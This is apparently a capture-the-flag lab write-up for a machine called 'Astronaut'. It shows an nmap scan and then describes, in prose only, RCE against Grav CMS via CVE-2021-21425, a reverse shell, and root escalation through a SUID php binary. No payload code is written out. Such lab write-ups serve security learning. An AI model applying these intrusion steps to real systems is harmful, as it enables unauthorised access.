Astronaut
Nmap Scan
$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.199.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 13:50 +08
Nmap scan report for 192.168.199.12
Host is up (0.0072s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
| 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Index of /
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-03-17 17:46 grav-admin/
|_
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.08 secondsInitial Access
Port 80
When we go port 80, we are greeted with this.
Upon clicking into it, it seems the website is running on Grav.
CVE-2021-21425
After searching online if there are any exploits, there is 1 that results in an RCE.
After running it once, we can see that it does not return any results.
However, if we ping back to our own machine, we are able to get back something
So we will try to execute the reverse shell payload.
Privilege Escalation
php SUID
php7.4 has the SUID set and its owner is root. This means that the command can be run as root instead.
After searching online, we can see that php is one of the few binaries that is able to escalate to root when it has the SUID bit set.
If we follow what they said in the website, we are able to run as root.
Last updated